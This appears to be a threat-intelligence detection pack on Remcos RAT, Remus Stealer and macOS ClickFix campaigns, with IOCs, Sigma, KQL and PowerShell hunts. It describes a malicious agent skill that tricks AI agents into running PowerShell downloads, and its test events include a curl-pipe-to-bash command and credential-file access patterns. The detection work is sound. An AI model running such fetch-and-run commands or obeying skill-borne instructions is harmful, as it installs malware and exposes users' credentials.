
Remcos RAT, Remus Stealer & macOS ClickFix: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 10, 2026

Threat Summary

Recent OTX pulses indicate a surge in diverse, highly evasive active campaigns targeting both the Windows and macOS ecosystems. The intelligence highlights three distinct, operationally sophisticated threats:

  1. OpenClaw/Remcos Campaign: Threat actors have weaponized the OpenClaw AI agent framework by publishing a malicious "DeepSeek-Claw" skill. This supply-chain-style attack tricks developers and AI agents into executing PowerShell commands that download a malicious MSI package. The package sideloads the Remcos RAT and GhostLoader through a legitimate, signed GoToMeeting executable to bypass security controls.

  2. Remus Stealer Evolution: Emerging as a successor to the doxxed Lumma Stealer, Remus is a 64-bit info-stealer specifically designed to bypass Application-Bound Encryption (ABE) in modern browsers. It utilizes advanced injection techniques and potentially Ethereum blockchain-based C2 infrastructure to siphon credentials and cryptocurrency wallet data directly from memory or storage.

  3. macOS ClickFix Surge: A social engineering campaign dubbed "ClickFix" is targeting macOS users. Attackers pose as troubleshooting guides on blogs, hosting malicious Terminal commands that download infostealers like Macsync, Shub Stealer, AMOS, and PhantomPulse.

Collectively, these campaigns demonstrate a shift toward abusing legitimate developer tools (AI frameworks) and signed binaries, combined with highly specific OS-level bypasses.

Threat Actor / Malware Profile

Remcos RAT & GhostLoader

  • Distribution: Malicious "DeepSeek-Claw" skill on the OpenClaw framework.
  • Attack Chain: PowerShell execution -> Download MSI -> Sideload malicious DLL via signed GoToMeeting binary.
  • Behavior: Remote Access Trojan (RAT) capabilities, data exfiltration, and persistence.
  • Persistence: Likely established via Registry Run keys or Scheduled Tasks (common for Remcos).
  • Anti-Analysis: Uses signed binary proxy execution to evade signature detection.

Remus Stealer

  • Distribution: Likely via cracked software or fraudulent updates (continuing Lumma's legacy).
  • Behavior: Steals browser cookies, passwords, and wallets. Bypasses Chrome/Edge Application-Bound Encryption.
  • C2 Communication: Potential usage of EtherHiding or standard HTTP/HTTPS to specific IP ranges.
  • Anti-Analysis: Evolved codebase to counter detection following the doxxing of the Lumma developers.

macOS ClickFix (Macsync/AMOS)

  • Distribution: Fake troubleshooting blogs/forums.
  • Attack Chain: User copies Terminal command -> curl/wget payload -> Pipe to Bash/Python -> Download Infostealer.
  • Behavior: Exfiltrates keychain data, browser cookies, and system info.

IOC Analysis

The provided indicators of compromise (IOCs) span multiple vectors, requiring a layered operational approach:

  • Domains (e.g., dropras.xyz, jihiz.com): These act as initial download vectors (C2/drop sites). SOC teams should block them at the DNS layer and inspect historical DNS logs for past resolutions, including resolutions of their subdomains.
  • IPv4 Addresses (e.g., 217.156.122.57): Infrastructure likely hosting the payloads or C2 servers. These should be blocked on perimeter firewalls.
  • File Hashes (MD5/SHA1): Associated with the malicious MSI package and the sideloaded payloads. EDR tools should be configured to alert on execution or presence of these hashes.

Operational Guidance:

  • SIEM/EDR: Ingest IOCs into threat intelligence platforms (TIPs) and automate blocking rules.
  • Network: Block the listed IPs and Domains at the proxy and firewall level.
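As an added example (not from the original pulse or the Security Arsenal script), the following Python sweeps constructed DNS log lines for the domain and IP indicators listed on this page; the key=value log format and the client addresses are assumptions. It matches subdomains of a listed domain on a label boundary, and it also flags resolutions of unlisted names to a listed IP, which a domain-only block list would miss.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Indicator sets taken from this page's IOC list (domains and IPv4 addresses).
IOC_DOMAINS = {"jihiz.com", "kayeart.com", "bintail.com", "wusetail.com", "dropras.xyz", "trackpipe.dev"}
IOC_IPS = {ipaddress.ip_address(a) for a in
           ("45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")}

def domain_matches(name: str) -> Optional[str]:
    """Return the listed domain that `name` equals or is a subdomain of, else None.
    The check is label-aware: 'cdn.dropras.xyz' matches, 'notdropras.xyz' does not."""
    name = name.rstrip(".").lower()
    for ioc in IOC_DOMAINS:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None

# Assumed key=value resolver log format (constructed for this example, not a real product's output).
LINE_RE = re.compile(r"(?P<ts>\S+) client=(?P<client>\S+) query=(?P<query>\S+) type=\S+ answer=(?P<answer>\S*)")

def scan_dns_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, normalized query, reason) for every line touching listed infrastructure.
    Unparseable lines are skipped rather than aborting the sweep."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        query = m["query"].rstrip(".").lower()
        ioc = domain_matches(query)
        if ioc:
            hits.append((m["ts"], m["client"], query, "domain:" + ioc))
            continue
        try:  # an unlisted name resolving to a listed address still points at the same infrastructure
            answer = ipaddress.ip_address(m["answer"])
        except ValueError:
            continue
        if answer in IOC_IPS:
            hits.append((m["ts"], m["client"], query, "ip:" + str(answer)))
    return hits

# Constructed log lines; client addresses and the example.invalid / example.com names are placeholders.
SAMPLE_LOG = [
    "2026-05-10T10:01:02Z client=10.0.0.5 query=cdn.dropras.xyz. type=A answer=203.0.113.10",
    "2026-05-10T10:01:05Z client=10.0.0.7 query=notdropras.xyz type=A answer=203.0.113.11",
    "2026-05-10T10:02:11Z client=10.0.0.9 query=updates.example.invalid type=A answer=217.156.122.57",
    "2026-05-10T10:03:00Z client=10.0.0.5 query=www.example.com type=AAAA answer=2001:db8::1",
    "malformed line that should be skipped",
]
```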

Detection Engineering

Sigma Rules

YAML
title: Potential Remcos RAT Download via PowerShell MSI
id: 4b0e5d9e-8a3c-4b1f-9c2d-3e5f6a7b8c9d
description: Detects PowerShell commands downloading MSI files, associated with the OpenClaw Remcos campaign involving GoToMeeting sideloading.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
    - https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains: 'Invoke-WebRequest'
    selection_msi:
        CommandLine|contains: '.msi'
    filter_legit:
        ParentImage|contains: '\Program Files\'
    condition: selection_pwsh and selection_msi and not filter_legit
falsepositives:
    - Administrative software installation
level: high
tags:
    - attack.initial_access
    - attack.t1204
---
title: macOS ClickFix Terminal Command Execution
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects suspicious Terminal commands piping curl/wget to bash, common in macOS ClickFix campaigns delivering infostealers.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
    - https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
logsource:
    category: process_creation
    product: macos
detection:
    selection_shell:
        Image|endswith: '/bin/bash'
        ParentImage|endswith: '/Terminal'
    selection_download:
        CommandLine|contains:
            - 'curl '
            - 'wget '
    selection_pipe:
        CommandLine|contains: ' | '
    condition: selection_shell and selection_download and selection_pipe
falsepositives:
    - Legitimate developer script execution
level: medium
tags:
    - attack.execution
    - attack.t1059.004
---
title: Remus Stealer Browser Credential Access
id: 9f8e7d6c-5b4a-3c2d-1e0f-9a8b7c6d5e4f
description: Detects suspicious process access to browser Login Data files, indicative of Remus Stealer or Lumma variants attempting to bypass encryption.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
    - https://cyberpress.org/remus-bypasses-browser-encryption/
logsource:
    category: file_access
    product: windows
detection:
    selection_target:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Google\Chrome\User Data\Local State'
            - '\Microsoft\Edge\User Data\Default\Login Data'
            - '\BraveSoftware\Brave-Browser\User Data\Default\Login Data'
    filter_browser:
        Image|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    condition: selection_target and not filter_browser
falsepositives:
    - Backup software or security scanners
level: high
tags:
    - attack.credential_access
    - attack.t1555.003
    - attack.t1005
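To confirm that the three rules fire where intended before deploying them, here is an added Python example (not from the page) that transcribes their detection sections and evaluates them against constructed process and file events. It implements only the endswith and contains modifiers and the AND/NOT condition shapes these rules use; every path and the example.invalid host are assumptions.

```python
def _match_field(event: dict, spec: str, values: list) -> bool:
    """One Sigma field test; only the endswith/contains modifiers the rules use.
    A list of values is an OR, and matching is case-insensitive as in Sigma."""
    field, modifier = spec.split("|")
    actual = event.get(field, "").lower()
    return any((modifier == "endswith" and actual.endswith(v.lower())) or
               (modifier == "contains" and v.lower() in actual) for v in values)

def _selection_hits(event: dict, selection: dict) -> bool:
    # Several fields inside one selection are ANDed, as in Sigma.
    return all(_match_field(event, spec, vals) for spec, vals in selection.items())

def evaluate(rule: dict, event: dict) -> bool:
    """Condition shape shared by the three rules: AND of all_of, and NOT any of none_of."""
    sel = rule["selections"]
    return (all(_selection_hits(event, sel[n]) for n in rule["all_of"])
            and not any(_selection_hits(event, sel[n]) for n in rule["none_of"]))

# Detection sections transcribed from the three Sigma rules above.
RULES = {
    "remcos_msi_download": {"all_of": ["selection_pwsh", "selection_msi"], "none_of": ["filter_legit"],
        "selections": {"selection_pwsh": {"Image|endswith": ["\\powershell.exe"],
                                          "CommandLine|contains": ["Invoke-WebRequest"]},
                       "selection_msi": {"CommandLine|contains": [".msi"]},
                       "filter_legit": {"ParentImage|contains": ["\\Program Files\\"]}}},
    "macos_clickfix": {"all_of": ["selection_shell", "selection_download", "selection_pipe"], "none_of": [],
        "selections": {"selection_shell": {"Image|endswith": ["/bin/bash"], "ParentImage|endswith": ["/Terminal"]},
                       "selection_download": {"CommandLine|contains": ["curl ", "wget "]},
                       "selection_pipe": {"CommandLine|contains": [" | "]}}},
    "remus_login_data": {"all_of": ["selection_target"], "none_of": ["filter_browser"],
        "selections": {"selection_target": {"TargetFilename|contains": [
                           "\\Google\\Chrome\\User Data\\Default\\Login Data",
                           "\\Microsoft\\Edge\\User Data\\Default\\Login Data"]},
                       "filter_browser": {"Image|endswith": ["\\chrome.exe", "\\msedge.exe", "\\brave.exe"]}}},
}
# Constructed sample events, not real telemetry; the host example.invalid is a reserved placeholder.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -c Invoke-WebRequest https://example.invalid/setup.msi -OutFile setup.msi"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Deploy\\deploy.exe",
     "CommandLine": "powershell -c Invoke-WebRequest https://example.invalid/agent.msi -OutFile agent.msi"},  # excluded by filter_legit
    {"Image": "/bin/bash", "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "CommandLine": "curl -fsSL https://example.invalid/fix.sh | bash"},
    {"Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\update.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
]
def run(events: list) -> dict:
    """Map each rule name to the indices of the events it fires on."""
    return {name: [i for i, e in enumerate(events) if evaluate(rule, e)] for name, rule in RULES.items()}
```

Adding an event such as chrome.exe itself reading Login Data to SAMPLE_EVENTS shows the filter_browser exclusion at work in the same way the second event exercises filter_legit.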

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for network connections to known Remus/Lumma C2 IPs and OpenClaw domains
let IoC_IPs = dynamic(["45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110"]);
let IoC_Domains = dynamic(["jihiz.com", "kayeart.com", "bintail.com", "wusetail.com", "dropras.xyz", "trackpipe.dev"]);
DeviceNetworkEvents
| where RemoteIP in (IoC_IPs) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl
| extend Timestamp = format_datetime(Timestamp, 'yyyy-MM-dd HH:mm:ss')

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Hunter for Remcos RAT and Remus Stealer
.DESCRIPTION
    Checks for file hashes associated with the OpenClaw campaign and network connections to Remus C2 infrastructure.
#>

$TargetHashes = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373"
)

$TargetIPs = @(
    "217.156.122.57",
    "217.156.122.75",
    "217.156.122.12",
    "45.151.106.110",
    "45.94.47.204"
)

Write-Host "[+] Checking for known malicious file hashes..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    # -File skips directories, which Get-FileHash cannot hash; the size bounds keep the sweep tractable
    Get-ChildItem -Path $Drive -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0KB -and $_.Length -lt 50MB } |
    ForEach-Object {
        $Hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        # -contains compares case-insensitively, so the uppercase hex from Get-FileHash matches the list
        if ($TargetHashes -contains $Hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (Hash: $Hash)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for active network connections to known C2 IPs..." -ForegroundColor Cyan
# Filter once against the whole list; several connections to the same IP are reported one per line
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $TargetIPs -contains $_.RemoteAddress }
foreach ($Conn in $Connections) {
    Write-Host "[!] SUSPICIOUS CONNECTION: Remote IP $($Conn.RemoteAddress):$($Conn.RemotePort) from local port $($Conn.LocalPort) (PID: $($Conn.OwningProcess))" -ForegroundColor Red
    Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue | Select-Object ProcessName, Path
}

Response Priorities

  • Immediate:
    • Block all IOCs (IPs and domains) at the network perimeter and proxy.
    • Scan endpoints for the specific MD5 hashes associated with the Remcos MSI payload.
    • Identify and quarantine systems executing PowerShell scripts that download MSI files from the internet.
  • 24 Hours:
    • Initiate credential resets for users on devices where a potential Remus/Lumma infection is detected (due to cookie and session theft).
    • Review logs for "DeepSeek-Claw" or "OpenClaw" related artifacts in developer environments.
  • 1 Week:
    • Enforce application control and code-signing policies (where possible) so that unsigned binaries, including the sideloaded DLL, cannot execute, disrupting the sideloading technique used by Remcos.
    • Conduct user awareness training specifically focused on "ClickFix" social engineering tactics for macOS users.
